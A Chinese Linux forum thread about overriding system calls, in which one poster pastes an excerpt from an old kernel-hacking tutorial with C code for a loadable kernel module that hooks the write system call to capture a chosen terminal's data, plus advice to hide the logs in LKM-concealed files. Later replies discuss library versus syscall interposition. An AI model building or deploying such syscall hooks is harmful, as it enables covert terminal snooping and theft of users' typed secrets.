请问在Linux如何覆盖系统调用函数？

asert

我在网上搜到了一篇文章，先发上来给大家瞧瞧，大家看行不?


//-----------------------------------------------------------------------
http://cache.baidu.com/c?m=9f65c ... 365c&user=baidu

2.7 TTY纪录的方法


纪录TTY是十分有趣的而且从很久以前就开始使用了，我们可以获得我们通过主值或者附值指定的TTY的每一个输入，在Phrack 50 halflife公布了一种十分好的LKM来做这个。

下面的代码是从他的LKM中摘抄的.他可以给每一个初学者演示TTY入侵的基本知识,尽管这并不是一个完整的实现.你不能直接使用他.因为我没有实现一个纪录用户TTY输入的的方法.这不过是给那些想懂得基础知识的人的.

好了,让我们继续:

2. #define MODULE
4. #define __KERNEL__
6. #include <linux/module.h>
8. #include <linux/kernel.h>
10. #include <asm/unistd.h>
12. #include <sys/syscall.h>
14. #include <sys/types.h>
16. #include <asm/fcntl.h>
18. #include <asm/errno.h>
20. #include <linux/types.h>
22. #include <linux/dirent.h>
24. #include <sys/mman.h>
26. #include <linux/string.h>
28. #include <linux/fs.h>
30. #include <linux/malloc.h>
32. #include <asm/io.h>
34. #include <sys/sysmacros.h>
36. int errno;
38. /*我们想纪录的TTY*/
40. int tty_minor = 2;
42. int tty_major = 4;
44. extern void* sys_call_table[];
46. /*我们需要write系统调用*/
48. static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);
50. void *original_write;
52. /*检查是否是我们需要的TTY*/
54. int is_fd_tty(int fd)
56. {
58. struct file *f=NULL;
60. struct inode *inode=NULL;
62. int mymajor=0;
64. int myminor=0;
66. if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode))
68. return 0;
70. mymajor = major(inode->i_rdev);
72. myminor = minor(inode->i_rdev);
74. if(mymajor != tty_major) return 0;
76. if(myminor != tty_minor) return 0;
78. return 1;
80. }
82. /*这是新的write(2)系统调用*/
84. extern int new_write(int fd, char *buf, size_t count)
86. {
88. int r;
90. char *kernel_buf;
92. if(is_fd_tty(fd))
94. {
96. kernel_buf = (char*) kmalloc(count+1, GFP_KERNEL);
98. memcpy_fromfs(kernel_buf, buf, count);
100. /*在这里你可以将输出缓存输出到任何你想要的地方,他表示着每一个被你选定的TTY设备的输入.我没有实现这个例行的过程,因为在附录A你会发现一个完整的很好的由halflife实现的TTY入侵工具*/
102. kfree(kernel_buf);
104. }
106. sys_call_table[SYS_write] = original_write;
108. r = write(fd, buf, count);
110. sys_call_table[SYS_write] = new_write;
112. if(r == -1) return -errno;
114. else return r;
116. }
118. int init_module(void)　　　　　　　　
120. {
122. /*你必须已经理解这个了*/
124. original_write = sys_call_table[SYS_write];
126. sys_call_table[SYS_write] = new_write;
128. return 0;
130. }
132. void cleanup_module(void)
134. {
136. /*不再记录了*/
138. sys_call_table[SYS_write] = original_write;
140. }

复制代码

注释会使得这些代码很容易被读懂.总体上的思路是截获sys_write(见 2.4.2)并且过滤我在2.4.2中提到的fd.在检查了fd的TTY是否是我们想跟踪的以后,我们就可以获得写入的数据并且将这些数据写入我们的纪录文件中(在上面的代码中没有实现).有好几种方法可以存储这些数据.halflife使用一个缓冲区(可以从我们自己的设备中获得),这是一个好主意(他也可以控制他的程序,通过ioctl命令来控制它的设备).

我个人推荐将这些数据存储在(被LKM)隐藏的文件中.并且用某种IPC来控制他.使用能够在你控制的系统中使用的方法.

hanchao3c

Post by remote fish;1907829
那么 hanchao 兄的观点是什么呢? 当实现了自己的 write 后, 为了调用原始的 write, 除了 dlopen 或者手工实现, hanchao 兄能提供别的什么好方法吗?

如果这里要区分系统调用与库函数, 那么 hanchao 兄能提供什么覆盖系统调用的简洁方法吗?

没办法，只能改内核。

我的意思只是说这样只能换库函数，没办法换系统调用

greek

参考：http://www.ibm.com/developerwork ... libc.html#icomments